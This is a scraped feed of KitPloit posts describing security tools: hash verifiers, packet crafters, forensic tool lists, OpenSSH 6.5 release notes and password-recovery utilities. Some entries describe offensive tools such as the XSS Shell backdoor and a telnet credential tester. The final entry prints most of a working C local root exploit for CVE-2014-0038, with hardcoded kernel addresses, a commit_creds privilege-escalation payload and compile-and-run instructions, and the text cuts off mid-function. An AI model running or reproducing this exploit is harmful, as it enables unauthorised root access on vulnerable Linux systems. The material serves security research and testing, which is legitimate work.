Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5728 articles
Browse latest View live

[Download Hash Verifier] Quickly Verify Integrity (MD5/SHA256 Hash) of Downloaded File

0
0

Download Hash Verifier is the FREE tool to verify the integrity of your downloaded file.

It makes file hash verification easier and quicker with its smart features such as 'Auto Hash Detection', 'Drag & Drop File', 'Instant copy from Clipboard' etc

Hash verification is a standard mechanism used to verify that downloaded file is original and not tempered. Often it happens that hackers modify the download files on the server and plant it with trojans/spywares.

Upon downloading and installing such softwares your PC will get infected eventually. To prevent such things, websites generally publish MD5 or SHA256 hash of the original file so that you can verify the same after you have downloaded the file. This will ensure that in case of any tempering with the file, end user will come to know about it and possibly alert the website administrator.

DownloadHashVerifier is designed to make this verification task easier and faster for end users. It supports both MD5 and SHA256 hash verification methods so you don't have to use multiple tools. Also it can automatically differentiate between MD5 & SHA256 hash methods without user explicitly mentioning it

It works on wide range of platforms starting from Windows XP to latest operating system Windows 8.


[SPS] Simple Packet Sender

0
0


A Linux packet crafting tool. Supports IPv4, IPv6 including extension headers, and tunneling IPv6 over IPv4. Written in C on Linux with GUI built using GTK+ and released under GPLv3. Does not require pcap.

Features:

Packet crafting and sending one, multiple, or flooding IPv4 and IPv6 packets of type TCP, ICMP, or UDP (or cycle through all three). All values within ethernet frame can be modified arbitrarily. Supports IPv4 header options, TCP header options, and TCP, ICMP and UDP data as well, input from either: keyboard as UTF-8/ASCII, keyboard as hexadecimal, or from file.

IPv6 support includes: hop-by-hop, "first" and "last" destination, routing, authentication, and encapsulating security payload (ESP) extension headers. For those without access to a native IPv6 network, IPv6 packets can be transmitted over IPv4 (6to4).

Packet fragmentation for IPv4, IPv6, and 6to4. Assumed maximum transmission unit (MTU) can be changed if unusual fragment sizes are needed.

IP addresses and port numbers can be randomized.

A configurable traceroute function, which supports TCP, ICMP, and UDP packets with all the features mentioned above.

View packets in hexadecimal/ASCII representation, in both unfragmented and fragmented forms.
All packet settings can be saved to and loaded from file.

IP and ASN delegation functions, including: country name/code search and reverse-search, autonomous system (AS) number search by country and reverse-search,  IPv4 and IPv6 address delegation search and reverse-search.

ARP (IPv4) and Neighbor Discovery (IPv6) for querying a LAN for MAC addresses of local nodes.
Retrieve MAC address and current MTU setting of any attached network interface.

Domain name resolution and reverse resolution.

[MailPasswordDecryptor v4.0] All-in-one eMail Password Recovery Software

0
0

Mail Password Decryptor is the FREE software to instantly recover Mail Account passwords from popular email clients and other desktop applications.

You can recover your lost password for email accounts like Gmail, Yahoo Mail, Hotmail or Windows Live Mail from email applications such as Microsoft Outlook, Thunderbird, IncrediMail, GTalk & many more.

MailPasswordDecryptor automatically crawls through each of these applications and instantly recovers all of the stored mail account passwords.

It presents both GUI interface & command line in a single software making it useful for Penetration testers as  well as Forensic investigators.

Current Mega release supports password recovery from Outlook 2013, Windows Live Mail 2012, Foxmail v7.x

It works on both 32-bit & 64-bit platforms starting from Windows XP to latest operating system Windows 8.

[Windbgshark] Windbg extension for VM traffic manipulation and analysis

0
0


This project includes an extension for the windbg debugger as well as a driver code, which allow you to manipulate the virtual machine network traffic and to integrate the wireshark protocol analyzer with the windbg commands.

The motivation of this work came from the intention to find a handy general-purpose way to debug network traffic flows under the Windows OS for the purposes of dynamic software testing for vulnerabilities, for reverse engineering of software and just for fun.

Theory of operation

The main idea is to rely on the Windows Filtering Platform capability to inspect traffic at the application level of OSI (however, the method works well on any level introduced by the WFP API). This gives us a way to intercept and modify any data, which goes through the Windows TCP/IP stack (even the localhost traffic), regardless of the application type and transport/network protocol. Modification and reinjection also work excellent: the operating systems does all the dirty work, reconstructing the transport and network layer headers, for example, as if we were sending the data from the usermode winsock application.

This tool needs a virtualized enviroment (it works fine with VMWare Workstation now) with windbg connected to the virtual machine as a kernel debugger. Installation is done in two steps: driver installation and extension loading in windbg. Driver intercepts network traffic, allows the windbg to modify it, and then reinjects packets back into the network stack. The extension on its turn implements simple interface for packet edit and also uses Wireshark to display data flows. The extension is executed on the host machine, while the driver is located on the virtual machine. To interact with its driver, windbg extension sets the corresponding breakpoints with its own callbacks right inside the driver code. Every time a packet comes in or out, a breakpoint is hit and the windbgshark extracts the app-level payload of the current packet, constructs a new pcap record and sends it to Wireshark. Before the packet is reinjected back, user may modify it, and the Wireshark will re-parse and show the modified record.

[Games Key Decryptor] Tool to Recover License/CD Keys of Popular Games

0
0

Games Key Decryptor is the Free all-ine-one Tool to instantly recover License Keys of popular Gaming Softwares. 

It automatically detects and recovers the license/CD key of all the supported Games installed on your system. Currently it supports around 50 PC Gaming softwares including Battlefield, Call of Duty, FIFA, NFS, Age of Empires, Quake, The Sims, Half-Life, IGI, Star Wars and many more.

After the successful recovery you can backup the CD Key list to HTML/XML/TEXT/CSV file. You can also right click on any of the displayed license key to quickly copy it.

New version v2.0 includes support for command-line making it suitable for automation and remote license key recovery.

It works on both 32 bit & 64 bit platforms starting from Windows XP to latest operating system, Windows 8.

[ExifTool] Read, Writing Meta Information Tools

0
0
ExifTool is a platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of files.ExifTool supports many different metadata formats including EXIF, GPS, IPTC, XMP, JFIF, GeoTIFF, ICC Profile, Photoshop IRB, FlashPix, AFCP and ID3, as well as the maker notes of many digital cameras by Canon, Casio, FLIR, FujiFilm, GE, HP, JVC/Victor, Kodak, Leaf, Minolta/Konica-Minolta, Nikon, Olympus/Epson, Panasonic/Leica, Pentax/Asahi, Phase One, Reconyx, Ricoh, Samsung, Sanyo, Sigma/Foveon and Sony.


Features


  •     Powerful, fast, flexible and customizable
  •     Supports a large number of different file formats
  •     Reads EXIF, GPS, IPTC, XMP, JFIF, MakerNotes, GeoTIFF, ICC Profile, Photoshop IRB, FlashPix, AFCP, ID3 and more...
  •     Writes EXIF, GPS, IPTC, XMP, JFIF, MakerNotes, ICC Profile, Photoshop IRB, AFCP and more...
  •     Reads and writes maker notes of many digital cameras
  •     Decodes a riddle wrapped in a mystery inside an enigma
  •     Numerous output formatting options (including tab-delimited, HTML, XML and JSON)
  •     Multi-lingual output (cs, de, en, en-ca, en-gb, es, fi, fr, it, ja, ko, nl, pl, ru, sv, tr, zh-cn or zh-tw)
  •     Geotags images from GPS track log files (with time drift correction!)
  •     Generates track logs from geotagged images
  •     Shifts date/time values to fix timestamps in images
  •     Renames files and organizes in directories (by date or by any other meta information)
  •     Extracts thumbnail images, preview images, and large JPEG images from RAW files
  •     Copies meta information between files (even different-format files)
  •     Reads/writes structured XMP information
  •     Deletes meta information individually, in groups, or altogether
  •     Sets the file modification date (and creation date in Windows) from EXIF information
  •     Supports alternate language tags in XMP, PNG, ID3, Font, QuickTime, ICC Profile, MIE and MXF information
  •     Processes entire directory trees
  •     Creates text output file for each image file
  •     Creates binary-format metadata-only (MIE) files for metadata backup
  •     Automatically backs up original image when writing
  •     Organizes output into groups
  •     Conditionally processes files based on value of any meta information
  •     Ability to add custom user-defined tags
  •     Support for MWG (Metadata Working Group) recommendations
  •     Recognizes thousands of different tags
  •     Tested with images from thousands of different camera models
  •     Advanced verbose and HTML-based hex dump outputs


[XSS Shell] XSS Backdoor and Zombie Manager

0
0


XSS Shell is powerful a XSS backdoor and zombie manager. This concept first presented by “XSS-Proxy – http://xss-proxy.sourceforge.net/”. Normally in XSS attacks attacker has one shot, in XSS Shell you can interactively send requests and get responses from victim. you can backdoor the page.

Download

This package includes the latest version of XSS Shell and XSSTunnel. XSS Shell can be used without XSS Tunnel, however you’ll get more out of it with XSS Tunnel.
Download XSS Shell and XSS Tunnel

Features

XSS Shell has several features to gain whole access over victim. Also you can simply add your own commands.
Most of the features can enable or disabled from configuration or can be tweaked from source code.
  • Regenerating Pages
    • This is one of the key and advanced features of XSS Shell. XSS Shell re-renders the infected page and keep user in virtual environment. Thus even user click any links in the infected page he or she will be still under control! (within cross-domain restrictions) In normal XSS attacks when user leaves the page you can’t do anything
    • Secondly this feature keeps the session open so even victim follow an outside link from infected page session is not going to timeout and you will be still in charge.
  • Keylogger
  • Mouse Logger (click points + current DOM)
  • Built-in Commands;
    • Get Keylogger Data
    • Get Current Page (Current rendered DOM / like screenshot)
    • Get Cookie
    • Execute supplied javaScript (eval)
    • Get Clipboard (IE only)
    • Get internal IP address (Firefox + JVM only)
    • Check victim’s visited URL history

Listado de Herramientas Forenses

0
0

ADQUISICIÓN Y ANÁLISIS DE LA MEMORIA 

Set de utilidades que permite la adquisición de la memoria ram para posteriormente hacer un análisis con ella.

pd Proccess Dumper - Convierte un proceso de la memoria a fichero.
FTK Imager - Permite entre otras cosas adquirir la memoria.
DumpIt - Realiza volcados de memoria a fichero.
Responder CE - Captura la memoria y permite analizarla.
Volatility - Analiza procesos y extrae información util para el analista.
RedLine - Captura la memoria y permite analizarla. Dispone de entrono gráfico.
Memorize - Captura la ram (Windows y OSX).


MONTAJE DE DISCOS

Utilidades para montar imágenes de disco o virtualizar unidades de forma que se tenga acceso al sistema de ficheros para posteriormente analizarla. 

ImDisk - Controlador de disco virtual.
OSFMount - Permite montar imágenes de discos locales en Windows asignando una letra de unidad.

raw2vmdk - Utilidad en java que permite convertir raw/dd a .vmdk

FTK Imager - Comentada anteriormente, permite realizar montaje de discos.
vhdtool - Convertidor de formato raw/dd a .vhd permitiendo el montaje desde el administrador de discos de Windows .
LiveView - Utilidad en java que crea una máquina virtual de VMware partiendo de una imagen de disco.
MountImagePro - Permite montar imágenes de discos locales en Windows asignando una letra de unidad

CARVING Y HERRAMIENTAS DE DISCO 

Recuperación de datos perdidos, borrados, búsqueda de patrones y ficheros con contenido determinado como por ejemplo imágenes, vídeos. Recuperación de particiones y tratamiento de estructuras de discos.


PhotoRec - Muy útil, permite la recuperación de imágenes y vídeo.
Scalpel -Independiente del sistema de archivos. Se puede personalizar los ficheros o directorios a recuperar.
RecoverRS - Recupera urls de acceso a sitios web y ficheros. Realiza carving directamente desde una imágen de disco. 
NTFS Recovery - Permite recuperar datos y discos aún habiendo formateado el disco.
Recuva - Utilidad para la recuperación de ficheros borrados.
Raid Reconstructor - Recuperar datos de un RAID roto, tanto en raid 5 o raid 0. Incluso si no conocemos los parámetros RAID.
CNWrecovery - Recupera sectores corruptos e incorpora utilidades de carving.
Restoration - Utilidad para la recuperación de ficheros borrados.
Rstudio - Recuperación de datos de cualquier sistema de disco NTFS, NTFS5, ReFS, FAT12/16/32, exFAT, HFS/HFS+ (Macintosh), Little y Big Endian en sus distintas variaciones UFS1/UFS2 (FreeBSD/OpenBSD/NetBSD/Solaris) y particiones Ext2/Ext3/Ext4 FS.
Freerecover - Utilidad para la recuperación de ficheros borrados.
DMDE - Admite FAT12/16, FAT32, NTFS, y trabaja bajo Windows 98/ME/2K/XP/Vista/7/8 (GUI y consola), DOS (consola), Linux (Terminal) e incorpora utilidades de carving.
IEF - Internet Evidence Finder Realiza carving sobre una imagen de disco buscando mas de 230 aplicaciones como chat de google, Facebook, IOS, memoria ram, memoria virtual,etc.


Bulk_extractor - Permite extraer datos desde una imagen, carpeta o ficheros.

UTILIDADES PARA EL SISTEMA DE FICHEROS

Conjunto de herramientas para el análisis de datos y ficheros esenciales en la búsqueda de un incidente.


analyzeMFT - David Kovar's utilidad en python que permite extraer la MFT
MFT Extractor- Otra utilidad para la extracción de la MFT 
INDXParse - Herramienta para los indices y fichero $I30.
MFT Tools (mft2csv, LogFileParser, etc.) Conjunto de utilidades para el acceso a la MFT 
MFT_Parser - Extrae y analiza la MFT
Prefetch Parser - Extrae y analiza el directorio prefetch
Winprefectchview - Extrae y analiza el directorio prefetch 

Fileassassin - Desbloquea ficheros bloqueados por los programas


ANÁLISIS DE MALWARE 

PDF Tools de Didier Stevens.
PDFStreamDumper - Esta es una herramienta gratuita para el análisis PDFs maliciosos.
SWF Mastah - Programa en Python que extrae stream SWF de ficheros PDF.
Proccess explorer - Muestra información de los procesos.
Captura BAT - Permite la monitorización de la actividad del sistema o de un ejecutable.
Regshot - Crea snapshots del registro pudiendo comparar los cambios entre ellos
Bintext - Extrae el formato ASCII de un ejecutable o fichero.
LordPE - Herramienta para editar ciertas partes de los ejecutables y volcado de memoria de los procesos ejecutados.
Firebug - Analisis de aplicaciones web.
IDA Pro - Depurador de aplicaciones.
OllyDbg - Desemsamblador y depurador de aplicaciones o procesos.
Jsunpack-n - Emula la funcionalidad del navegador al visitar una URL. Su propósito es la detección de exploits
OfficeMalScanner - Es una herramienta forense cuyo objeto es buscar programas o ficheros maliciosos en Office.
Radare - Framework para el uso de ingeniería inversa.
FileInsight - Framework para el uso de ingeniería inversa.
Volatility Framework con los plugins malfind2 y apihooks.
shellcode2exe - Conversor de shellcodes en binarios.


FRAMEWORKS


Conjunto estandarizado de conceptos, prácticas y criterios en base a el análisis forense de un caso.

PTK Busca ficheros, genera hash, dispone de rainbow tables. Analiza datos de un disco ya montado. 
Log2timeline - Es un marco para la creación automática de un super línea de tiempo.
Plaso - Evolución de Log2timeline. Framework para la creación automática de un super línea de tiempo.

OSForensics - Busca ficheros, genera hash, dispone de rainbow tables. Analiza datos de un disco ya montado.
DFF - Framework con entorno gráfico para el análisis.
SANS SIFT Workstation - Magnifico Appliance de SANS. Lo utilizo muy a menudo.
Autopsy - Muy completo. Reescrito en java totalmente para Windows. Muy útil.

ANÁLISIS DEL REGISTRO DE WINDOWS

Permite obtener datos del registro como usuarios, permisos, ficheros ejecutados, información del sistema, direcciones IP, información de aplicaciones.


RegRipper - Es una aplicación para la extracción, la correlación, y mostrar la información del registro.
WRR - Permite obtener de forma gráfica datos del sistema, usuarios y aplicaciones partiendo del registro.

Shellbag Forensics Análisis de los shellbag de windows.
Registry Decoder - Extrae y realiza correlación aun estando encendida la máquina datos del registro.



HERRAMIENTAS DE RED

Todo lo relacionado con el tráfico de red, en busca de patrones anómalos, malware, conexiones sospechosas, identificación de ataques, etc.


WireShark - Herramienta para la captura y análisis de paquetes de red.
NetworkMiner - Herramienta forense para el descubrimiento de información de red.
Netwitness Investigator - Herramienta forense. La versión 'free edition' está limitado a 1GB de tráfico.
Network Appliance Forensic Toolkit - Conjunto de utilidades para la adquisición y análisis de la red.
Xplico - Extrae todo el contenido de datos de red (archivo pcap o adquisición en tiempo real). Es capaz de extraer todos los correos electrónicos que llevan los protocolos POP y SMTP, y todo el contenido realizado por el protocolo HTTP.
Snort - Detector de intrusos. Permite la captura de paquetes y su análisis.
Splunk - Es el motor para los datos y logs que generan los dispositivos, puestos y servidores. Indexa y aprovecha los datos de las generados por todos los sistemas e infraestructura de IT: ya sea física, virtual o en la nube.
AlientVault - Al igual que Splunk recolecta los datos y logs aplicándoles una capa de inteligencia para la detección de anomalías, intrusiones o fallos en la política de seguridad.

RECUPERACIÓN DE CONTRASEÑAS

Todo lo relacionado con la recuperación de contraseñas en Windows, por fuerza bruta, en formularios, en navegadores.


Ntpwedit - Es un editor de contraseña para los sistemas basados ​​en Windows NT (como Windows 2000, XP, Vista, 7 y 8), se puede cambiar o eliminar las contraseñas de cuentas de sistema local. No valido para Active Directory.
Ntpasswd - Es un editor de contraseña para los sistemas basados ​​en Windows, permite iniciar la utilidad desde un CD-LIVE
pwdump7 - Vuelca los hash. Se ejecuta mediante la extracción de los binarios SAM.
SAMInside / OphCrack / L0phtcrack- Hacen un volcado de los hash. Incluyen diccionarios para ataques por fuerza bruta.



DISPOSITIVOS MÓVILES

Esta sección dispone de un set de utilidades y herramientas para la recuperación de datos y análisis forense de dispositivos móviles. He incluido herramientas comerciales dado que utilizo algunas de ellas y considero que son muy interesantes e importantes.


iPhone

iPhoneBrowser - Accede al sistema de ficheros del iphone desde entorno gráfico.
iPhone Analyzer - Explora la estructura de archivos interna del iphone.
iPhoneBackupExtractor - Extrae ficheros de una copia de seguridad realizada anteriormente.
iPhone Backup Browser - Extrae ficheros de una copia de seguridad realizada anteriormente.
iPhone-Dataprotection - Contiene herramientas para crear un disco RAM forense, realizar fuerza bruta con contraseñas simples (4 dígitos) y descifrar copias de seguridad.
iPBA2 - Accede al sistema de ficheros del iphone desde entorno gráfico.

sPyphone - Explora la estructura de archivos interna.

BlackBerry

Blackberry Desktop Manager - Software de gestión de datos y backups.
Phoneminer - Permite extraer, visualizar y exportar los datos de los archivos de copia de seguridad.
Blackberry Backup Extractor - Permite extraer, visualizar y exportar los datos de los archivos de copia de seguridad.

MagicBerry - Puede leer, convertir y extraer la base de datos IPD.

Android

android-locdump. - Permite obtener la geolocalización.

androguard - Permite obtener, modificar y desensamblar formatos DEX/ODEX/APK/AXML/ARSC
viaforensics - Framework de utilidades para el análisis forense.

Osaf - Framework de utilidades para el análisis forense.

PRODUCTOS COMERCIALES

No podían faltar. Disponer de estas herramientas es una maravilla y un lujo el poder utilizarlas. Rápidas y concisas. Lo peor en alguna de ellas es el precio.


[Lazy-Kali] Bash Script for Kali Linux

0
0

A bash script for when you feel lazy.
Adds quite a few tools to Kali Linux.
  • Bleeding Edge Repos
  • AngryIP Scanner
  • Terminator
  • Xchat
  • Unicornscan
  • Nautilus Open Terminal
  • Simple-Ducky
  • Subterfuge
  • Ghost-Phisher
  • Yamas
  • PwnStar
  • Ettercap0.7.6
  • Xssf
  • Smbexec
  • Flash
  • Java
  • Easy-Creds
  • Java
... and more!
Lazy-Kali will also update Kali, Start Metaploit Services, Start Stop And Update Open-Vas 

[EtherApe] A graphical network monitor

0
0

EtherApe is a graphical network monitor for Unix modeled after etherman. Featuring link layer, IP and TCP modes, it displays network activity graphically. Hosts and links change in size with traffic. Color coded protocols display.

It supports Ethernet, FDDI, Token Ring, ISDN, PPP, SLIP and WLAN devices, plus several encapsulation formats. It can filter traffic to be shown, and can read packets from a file as well as live from the network. Node statistics can be exported.


Overview of changes in EtherApe 0.9.13:


Central node option, useful for displaying routers or proxies.
Translations and documentation updates, plus some fixes.

OpenSUSE build service now provides binary packages for Fedora 17 and 18 and SLES 11 SP2.
Changes summary:
  • Optional central node, based on work of Javier Fernandez-Sanguino Peña.
  • re-enabled full-screen mode, thanks to nrvale0
  • Updated spanish translation, thanks to Javier Fernandez-Sanguino Peña.
  • Added German translation, and fixed typos, thanks to Chris Leick.
  • Updated documentation.

[PACK] Password Analysis & Cracking Kit

0
0


PACK (Password Analysis and Cracking Toolkit) is a collection of utilities developed to aid in analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics. The toolkit generates valid input files for Hashcat family of password crackers.

NOTE: The toolkit itself is not able to crack passwords, but instead designed to make operation of password crackers more efficient.

[Lynis 1.4.0] Security and System Auditing Tool to Harden Linux Systems

0
0


Lynis is an auditing tool for Unix/Linux. It performs a security scan and determines the hardening state of the machine. Any detected security issues will be provided in the form of a suggestion or warning. Beside security related information it will also scan for general system information, installed packages and possible configuration errors.

This software aims in assisting automated auditing, hardening, software patch management, vulnerability and malware scanning of Unix/Linux based systems. It can be run without prior installation, so inclusion on read only storage is possible (USB stick, cd/dvd).

Lynis assists auditors in performing Basel II, GLBA, HIPAA, PCI DSS and SOx (Sarbanes-Oxley) compliance audits.

Intended audience:Security specialists, penetration testers, system auditors, system/network managers.

Examples of audit tests:
  • Available authentication methods
  • Expired SSL certificates
  • Outdated software
  • User accounts without password
  • Incorrect file permissions
  • Configuration errors
  • Firewall auditing

[TYFYP] Massive Telnet Password Tester

0
0


Commercial name: TYFYP (Thank you for your password), to the honor of ADTRAN telnet banner motd welcome message.

Please use it ONLY in LAN IPs. This is a very rudimentary program only for investigation purposes. Developed on Retina Display machine, so there may be UI errors in normal resolution screens.

REQUIREMENTS:

  • Windows.
  • .NET Framework v4.5

HOW TO USE:

  • Open TYFYP.exe or complile it in Visual Studio.
  • Select a .txt file with IPs list you want to try.
  • Write a default telnet username, password and enable password.
  • Click "Run".

WHAT IT WILL DO:

  • Check IP by IP telnet username and password.
  • If there is a connection, it will try enable password.
  • You will see green lines in case of successful connection, red lines if not.
  • Clear red lines means there wasn't telnet service listening (or your network connection fails).

FUTURE IMPROVEMENTS:

  • Be able to read telnet user, password and enable password directly from IP list txt. This will allow to try multiples password for each IP.
  • Make it multi-threading.

[OpenSSH 6.5] FREE version of the SSH Connectivity Tools

0
0


OpenSSH is a FREE version of the SSH connectivity tools that technical users of the Internet rely on. Users of telnet, rlogin, and ftp may not realize that their password is transmitted across the Internet unencrypted, but it is. OpenSSH encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other attacks. Additionally, OpenSSH provides secure tunneling capabilities and several authentication methods, and supports all SSH protocol versions.

The OpenSSH suite replaces rlogin and telnet with the sshprogram, rcp with scp, and ftp with sftp. Also included is sshd(the server side of the package), and the other utilities like ssh-add, ssh-agent, ssh-keysign, ssh-keyscan, ssh-keygen and sftp-server.

OpenSSH is developed by the OpenBSD Project. The software is developed in countries that permit cryptography export and is freely useable and re-useable by everyone under a BSD license. However, development has costs, so if you find OpenSSH useful (particularly if you use it in a commercial system that is distributed) please consider donating to help fund the project.

OpenSSH is developed by two teams. One team does strictly OpenBSD-based development, aiming to produce code that is as clean, simple, and secure as possible. We believe that simplicity without the portability "goop" allows for better code quality control and easier review. The other team then takes the clean version and makes it portable (adding the "goop") to make it run on many operating systems -- the so-called -p releases, ie "OpenSSH 4.0p1". 

Changes since OpenSSH 6.4
=========================

This is a feature-focused release.

New features:

* ssh(1), sshd(8): Add support for key exchange using elliptic-curve
Diffie Hellman in Daniel Bernstein's Curve25519. This key exchange
method is the default when both the client and server support it.

* ssh(1), sshd(8): Add support for Ed25519 as a public key type.
Ed25519 is a elliptic curve signature scheme that offers
better security than ECDSA and DSA and good performance. It may be
used for both user and host keys.

* Add a new private key format that uses a bcrypt KDF to better
protect keys at rest. This format is used unconditionally for
Ed25519 keys, but may be requested when generating or saving
existing keys of other types via the -o ssh-keygen(1) option.
We intend to make the new format the default in the near future.
Details of the new format are in the PROTOCOL.key file.

* ssh(1), sshd(8): Add a new transport cipher
"chacha20-poly1305@openssh.com" that combines Daniel Bernstein's
ChaCha20 stream cipher and Poly1305 MAC to build an authenticated
encryption mode. Details are in the PROTOCOL.chacha20poly1305 file.

* ssh(1), sshd(8): Refuse RSA keys from old proprietary clients and
servers that use the obsolete RSA+MD5 signature scheme. It will
still be possible to connect with these clients/servers but only
DSA keys will be accepted, and OpenSSH will refuse connection
entirely in a future release.

* ssh(1), sshd(8): Refuse old proprietary clients and servers that
use a weaker key exchange hash calculation.

* ssh(1): Increase the size of the Diffie-Hellman groups requested
for each symmetric key size. New values from NIST Special
Publication 800-57 with the upper limit specified by RFC4419.

* ssh(1), ssh-agent(1): Support PKCS#11 tokens that only provide
X.509 certs instead of raw public keys (requested as bz#1908).

* ssh(1): Add a ssh_config(5) "Match" keyword that allows
conditional configuration to be applied by matching on hostname,
user and result of arbitrary commands.

* ssh(1): Add support for client-side hostname canonicalisation
using a set of DNS suffixes and rules in ssh_config(5). This
allows unqualified names to be canonicalised to fully-qualified
domain names to eliminate ambiguity when looking up keys in
known_hosts or checking host certificate names.

* sftp-server(8): Add the ability to whitelist and/or blacklist sftp
protocol requests by name.

* sftp-server(8): Add a sftp "fsync@openssh.com" to support calling
fsync(2) on an open file handle.

* sshd(8): Add a ssh_config(5) PermitTTY to disallow TTY allocation,
mirroring the longstanding no-pty authorized_keys option.

* ssh(1): Add a ssh_config ProxyUseFDPass option that supports the
use of ProxyCommands that establish a connection and then pass a
connected file descriptor back to ssh(1). This allows the
ProxyCommand to exit rather than staying around to transfer data.

Bugfixes:

* ssh(1), sshd(8): Fix potential stack exhaustion caused by nested
certificates.

* ssh(1): bz#1211: make BindAddress work with UsePrivilegedPort.

* sftp(1): bz#2137: fix the progress meter for resumed transfer.

* ssh-add(1): bz#2187: do not request smartcard PIN when removing
keys from ssh-agent.

* sshd(8): bz#2139: fix re-exec fallback when original sshd binary
cannot be executed.

* ssh-keygen(1): Make relative-specified certificate expiry times
relative to current time and not the validity start time.

* sshd(8): bz#2161: fix AuthorizedKeysCommand inside a Match block.

* sftp(1): bz#2129: symlinking a file would incorrectly canonicalise
the target path.

* ssh-agent(1): bz#2175: fix a use-after-free in the PKCS#11 agent
helper executable.

* sshd(8): Improve logging of sessions to include the user name,
remote host and port, the session type (shell, command, etc.) and
allocated TTY (if any).

* sshd(8): bz#1297: tell the client (via a debug message) when
their preferred listen address has been overridden by the
server's GatewayPorts setting.

* sshd(8): bz#2162: include report port in bad protocol banner
message.

* sftp(1): bz#2163: fix memory leak in error path in do_readdir().

* sftp(1): bz#2171: don't leak file descriptor on error.

* sshd(8): Include the local address and port in "Connection from
..." message (only shown at loglevel>=verbose).

Portable OpenSSH:

* Please note that this is the last version of Portable OpenSSH that
will support versions of OpenSSL prior to 0.9.6. Support (i.e.
SSH_OLD_EVP) will be removed following the 6.5p1 release.

* Portable OpenSSH will attempt compile and link as a Position
Independent Executable on Linux, OS X and OpenBSD on recent gcc-
like compilers. Other platforms and older/other compilers may
request this using the --with-pie configure flag.

* A number of other toolchain-related hardening options are used
automatically if available, including -ftrapv to abort on signed
integer overflow and options to write-protect dynamic linking
information. The use of these options may be disabled using the
--without-hardening configure flag.

* If the toolchain supports it, one of the -fstack-protector-strong,
-fstack-protector-all or -fstack-protector compilation flag are
used to add guards to mitigate attacks based on stack overflows.
The use of these options may be disabled using the
--without-stackprotect configure option.

* sshd(8): Add support for pre-authentication sandboxing using the
Capsicum API introduced in FreeBSD 10.

* Switch to a ChaCha20-based arc4random() PRNG for platforms that do
not provide their own.

* sshd(8): bz#2156: restore Linux oom_adj setting when handling
SIGHUP to maintain behaviour over retart.

* sshd(8): bz#2032: use local username in krb5_kuserok check rather
than full client name which may be of form user@REALM.

* ssh(1), sshd(8): Test for both the presence of ECC NID numbers in
OpenSSL and that they actually work. Fedora (at least) has
NID_secp521r1 that doesn't work.

* bz#2173: use pkg-config --libs to include correct -L location for
libedit.

Exploit Linux 3.4+ Arbitrary write with CONFIG_X86_X32

0
0

CVE: 2014-0038
Author: saelo
Published: 2014-02-02

/*
* Local root exploit for CVE-2014-0038.
*
* https://raw.github.com/saelo/cve-2014-0038/master/timeoutpwn.c
*
* Bug: The X86_X32 recvmmsg syscall does not properly sanitize the timeout pointer
* passed from userspace.
*
* Exploit primitive: Pass a pointer to a kernel address as timeout for recvmmsg,
* if the original byte at that address is known it can be overwritten
* with known data.
* If the least significant byte is 0xff, waiting 255 seconds will turn it into a 0x00.
*
* Restrictions: The first long at the passed address (tv_sec) has to be positive
* and the second long (tv_nsec) has to be smaller than 1000000000.
*
* Overview: Target the release function pointer of the ptmx_fops structure located in
* non initialized (and thus writable) kernel memory. Zero out the three most
* significant bytes and thus turn it into a pointer to an address mappable in
* user space.
* The release pointer is used as it is followed by 16 0x00 bytes (so the tv_nsec
* is valid).
* Open /dev/ptmx, close it and enjoy.
*
* Not very beautiful but should be fairly reliable if symbols can be resolved.
*
* Tested on Ubuntu 13.10
*
* gcc timeoutpwn.c -o pwn && ./pwn
*
* Written by saelo
*/
#define _GNU_SOURCE
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <sys/mman.h>

#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)

#define BUFSIZE 200
#define PAYLOADSIZE 0x2000
#define FOPS_RELEASE_OFFSET 13*8

/*
* Adapt these addresses for your need.
* see /boot/System.map* or /proc/kallsyms
* These are the offsets from ubuntu 3.11.0-12-generic.
*/
#define PTMX_FOPS 0xffffffff81fb30c0LL
#define TTY_RELEASE 0xffffffff8142fec0LL
#define COMMIT_CREDS 0xffffffff8108ad40LL
#define PREPARE_KERNEL_CRED 0xffffffff8108b010LL

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

/*
* Match signature of int release(struct inode*, struct file*).
*
* See here: http://grsecurity.net/~spender/exploits/enlightenment.tgz
*/
int __attribute__((regparm(3)))
kernel_payload(void* foo, void* bar)
{
_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;

*((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1; // restore pointer
commit_creds(prepare_kernel_cred(0));

return -1;
}

/*
* Write a zero to the byte at then given address.
* Only works if the current value is 0xff.
*/
void zero_out(long addr)
{
int sockfd, retval, port, pid, i;
struct sockaddr_in sa;
char buf[BUFSIZE];
struct mmsghdr msgs;
struct iovec iovecs;

srand(time(NULL));

port = 1024 + (rand() % (0x10000 - 1024));

sockfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sockfd == -1) {
perror("socket()");
exit(EXIT_FAILURE);
}

sa.sin_family = AF_INET;
sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
sa.sin_port = htons(port);
if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
perror("bind()");
exit(EXIT_FAILURE);
}

memset(&msgs, 0, sizeof(msgs));
iovecs.iov_base = buf;
iovecs.iov_len = BUFSIZE;
msgs.msg_hdr.msg_iov = &iovecs;
msgs.msg_hdr.msg_iovlen = 1;

/*
* start a seperate process to send a udp message after 255 seconds so the syscall returns,
* but not after updating the timout struct and writing the remaining time into it.
* 0xff - 255 seconds = 0x00
*/
printf("clearing byte at 0x%lx\n", addr);
pid = fork();
if (pid == 0) {
memset(buf, 0x41, BUFSIZE);

if ((sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
perror("socket()");
exit(EXIT_FAILURE);
}

sa.sin_family = AF_INET;
